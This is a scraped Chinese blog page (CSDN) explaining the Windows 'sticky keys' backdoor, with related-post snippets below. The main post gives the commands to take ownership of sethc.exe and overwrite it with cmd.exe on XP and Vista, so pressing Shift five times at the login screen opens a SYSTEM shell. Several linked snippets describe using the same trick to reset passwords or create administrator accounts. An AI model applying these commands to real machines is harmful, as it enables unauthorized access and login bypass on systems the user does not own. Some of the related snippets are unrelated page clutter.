WINDOWS漏洞:粘置键

最新推荐文章于 2022-06-30 17:47:54 发布
最新推荐文章于 2022-06-30 17:47:54 发布
阅读量1w 收藏 1
点赞数
分类专栏: WINDOWS应用 文章标签: windows shell xp 联想 cmd c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scz123/article/details/1528695
版权
在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。

参考McafeeAvertLabs:
http://www.avertlabs.com/research/blog/?p=218

XP:
将安装源光盘弹出(或将硬盘上的安装目录改名)
cd %widnir%/system32/dllcache
ren sethc.exe *.ex~
cd %widnir%/system32
copy /y cmd.exe sethc.exe

VISTA:
takeown /f c:/windows/system32/sethc.exe
cacls c:/windows/system32/sethc.exe /G administrator:F
然后按XP方法替换文件

在登录界面按5此SHIFT,出来cmd shell,然后……
scz123
关注
专栏目录
windows操作系统实验之粘滞键漏洞
m0_55525922的博客
04-13 473
Windows系统登录界面状态下,粘滞键仍可以以连续按5下SHIFT键运行,并且此时应用程序会以WINDOWS的最高权限-SYSTEM权限运行,所以计算机一旦被安装该后门,入侵者便可悄无声息地远程操纵计算。找到名字为sethc的文件(随便点击一个文件,按s键就可以快速查找s开头的文件),也就是粘滞键,把文件名改成任意名。选择计算机——d盘(也就是平时系统的c盘)————windows目录——System32目录,是计算机最高的权限,那么就可以输入命令修改账户的密码,或者新建一个用户,赋予它管理员的权限。
Windows服务详解
xj28555的博客
08-15 4009
Windows服务详解 在 “开始” 的 “运行” 中 输入: services.msc 进入XP自带服务修改列表 可以选择关闭,手动,还是自动. 自动为跟windows一起启动。 手动为需要时它自行启动。 关闭为永远不启动。 开始吧: alerter -错误警报器,垃圾,关闭。 application layer gateway service -给与第三者网络共享/防火墙支持的服务,有些防火墙/网络共享软件需要。占用1。5mb内存。 application management-用于设定,发布和删除软
粘滞键漏洞,按5下shift后,windows就执行了system32下的sethc.exe
weixin_30781433的博客
06-19 440
粘滞键漏洞,按5下shift后,windows就执行了system32下的sethc.exe Windows的粘滞键。是按5下shift后,windows就执行了system32下的sethc.exe。即使 在3389中,都可以弹出!! 它本来是为不方便按组合键的人设计的。 如果我们把那个sethc.exe替换成我们想要的其它文件,比如说cmd.exe,那么就可以用cmd命令了...
关于windows的粘滞键后门漏洞
qq_52134654的博客
06-30 2755
漏洞仅适用于Windows7及以下的windows操作系统。粘滞键是一种快捷键,是为同时按下两个或多个键有困难的人而设计的,要功能是方便Shift、Ctrl、Alt与其他键的组合使用。启动粘滞键可通过单击“开始→设置→控制面板→辅助功能选项”,在“键盘”选项卡下选中“使用粘滞键”来启动。或者连续按shift键五次。开启粘滞键的时候,任务栏右边的系统托盘区会出现粘滞键图标。...
Win7 粘滞键漏洞利用绕过登录密码
老司机开代码的博客
09-26 4692
文章目录1. 原理2. 利用 1. 原理 在win7登录界面,连按5次Shift,则会弹出粘滞键提示。而此程序的路径位于c:\windows\system32路径下。可以将此程序的路径掉包成cmd,实现在登录界面弹出cmd命令行,重置登录密码实现登录。 2. 利用 首先开启win7,在启动的过程中直接断电强制关机。然后再次启动,win7会出现一个修复的界面。我们选择修复排查问题那一选项。 然后windows会建议我们还原系统,这里选择取消。 取消后,会等待比较长的一段时间。 这里选择查看问题详细信息
模糊测试--强制性安全漏洞发掘
软件性能测试专栏
01-20 2万+
文档分享地址链接:http://pan.baidu.com/share/link?shareid=2723797392&uk=2485812037 密码:r43x 前 言 我知道"人类和鱼类能够和平共处" 。 --George W. Bush, 2000年9月29日 简介 模糊测试的概念至少已经流传了20年,但是直到最近才引起广泛的关注。安全漏洞困扰了许多流行的客户端应用程序
注册表知识与技巧大全
08-03 1万+
注册表知识和技巧大全 注册表基础: ********系统文件夹:********* 名称 路径 含义 AppData C:\Windows\Application Data 应用程序 Cache C:\Windows\Temporary Internet Files
04 渗透测试基础
weixin_43234021的博客
01-04 1万+
渗透测试基础一 代码审计1 基础环境搭建(1) Web服务:WAMP+phpstudy(2) phpstudy2 HTML 表单 一 代码审计 1 基础环境搭建 (1) Web服务:WAMP+phpstudy (2) phpstudy 启动问题 端口正常开放 80 http 3306 mysql web根目录[C:\Users\dq\Documents\phpStudy-1-24\phpStudy\WWW] php 探针 phpinfo.php phpmyadmin Apache配置文件:[
面试官吐槽:“软件测试员就是不行!”网友:我能把你面哭了!——软件测试笔试面试题目完全汇总
weixin_45129876的博客
08-04 4669
软件测试笔试面试题目完全汇总 软件缺陷: 1)软件未实现产品说明书要求的功能 2)软件出现了产品说明书指明不应该出现的错误 3)软件实现了产品说明书未提到的功能 4)软件未实现产品说明书虽未明确提及但应该实现的目标 5)软件难以理解、不易使用、运行缓慢或者从测试员的角度看最终用户会认为不好。 软件测试:为了发现软件产品中的各种缺陷,而对软件产品进行验证和确认的活动过程,此过程贯穿整个软件开发生命周期。 简单的说,软件测试是以发现错误为目的而执行的一个程序或系统的过程。 软件测试的目的: 1.验证软件需求和
用粘滞键本地破解WINDOWS XP /2003/vista 密码
刘欢的专栏
12-04 4649
________________________________________________________________________________________________________ sanhen版_______________________________________________________________________________________
计算机按键被粘了一样,电脑总是自动重复按键盘上的一个键 经验告诉你该这样...
热门推荐
weixin_42303003的博客
07-29 2万+
电脑开机打字的时候,有时候会遇到,重复的自动打同一个字或者字母,根本停不下来的情况,这种情况持续了好多天,要怎么解决呢?工具/材料腾讯电脑管家检查键盘内部按键01出现这种情况,很可能是卡键引起的,我的其实就是卡键,是键盘里面的硅胶垫给卡住了,我们可以拿一个细点的小一字改锥撬动键盘按键02撬动之后,如果你是薄膜键盘的话,就会看到下面有一个白色的按键,把他平铺的方式放好,如果破损了就只能换一个了,如果...
windows粘滞键提权的尝试与思考
Sp4rkW的博客
02-07 8083
前言 早上地铁上看到了安全客的一篇文章,从一道高质量的ctf题中看渗透测试,虽然只是一道ctf题,但是对其中提到的粘滞键提权十分好奇,这里对其做了一个简单的实验~ 原理 windows下连续按五次shift会调用c:\windows\system32\sethc.exe 在我们已经登录系统时,这个程序是以我们自己的用户权限运行的。 但是当我们未登陆系统(停留在登陆界面)的时候 系统还
在VMware中,双击鼠标左键,ctrl键粘滞问题
ukoyi的博客
09-21 3276
在虚拟机下开发程序时,发现键盘输入异常。后发现是双击鼠标左键时,ctrl键粘滞所致。 网上搜索解决方案是:                                  在VMvare中 选择“虚拟机” -》 “设置” -》“选项” -》“使用增强型键盘” 由于本人VMware中未安装“增强型键盘‘组件,故该解决方案未进行验证。 之前虚拟机运行是正常的,于是分析导致该异
解决操作系统无法打开.exe可执行文件的方法
yusiyu的技术专栏
02-21 9761
今天一同事电脑出现严重问题,打开我的电脑后弹出一个对话框说“无法找到C:\WINDOWS\system32\rundll32.exe”,然后打开一些已经安装的软件程序却弹出一个让你选择打开方式的对话框,瑞星杀毒软件被禁用,整个机子像瘫痪了一样,无法运行任何程序。其实这是病毒或木马对exe文件打开方式进行了修改,导致无法打开任何可执行文件。经过研究终于找到解决方法。     一般朋友遇到此类问
利用win7shift粘滞键漏洞破解系统密码
星|Donstpast
03-27 3037
你需要知道的一些东西: 1.粘滞键位置:c:\windows\system32\stthc.exe 2.cmd路径:c:\windows\system32\cmd 3.用户密码储存位置:c:\windows\system32\config\SAM 4.修改用户密码的命令:net user 用户名 密码 本次实验环境 实验原理 这是一次关于提权的尝试。shift粘滞键漏洞windows系统一个经典...
第一篇博客:windows 7的5次shift漏洞
wlp_wangyue的博客
10-02 1235
第一篇博客:Windows 5次shift漏洞。这个漏洞我是在看网络安全相关视频看到的,在windows登录界面连续按5次shift,会弹出“粘滞键”的框,利用这个弹窗和windows的系统恢复功能来篡改C:\Windows\System32下的sethc的文件名,利用命令行创建新的账户,以此来绕过之前的账户密码登录。
Windows Server 2008漏洞封堵
理性的幻想
06-14 1017
<br /><br />尽管Windows Server 2008系统的安全性能已经无与伦比,不过这并不意味着该系统自身已经没有任何安全漏洞了。对于Internet或局域网中狡猾的“黑客”来说,Windows Server 2008系统中的安全漏洞仍然比比皆是,只是它们的隐蔽性相对强一点而已;如果我们不能对一些重要的隐私漏洞进行及时封堵,“黑客”照样能够利用这些漏洞来攻击Windows Server 2008系统。为此,我们需要积极行动起来,采取切实可行的措施来封堵隐私漏洞,守卫Windows Server
ctrl键
krysen的博客
06-20 175
如何检测CVE-2024-38077漏洞Windows远程代码执行
CVE-2024-38077是一个特定的安全漏洞标识,它指的是在Windows远程桌面授权服务中发现的远程代码执行漏洞。此类漏洞允许攻击者通过远程桌面协议(RDP)在目标系统上执行任意代码。这种安全漏洞的严重性很高,因为攻击...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值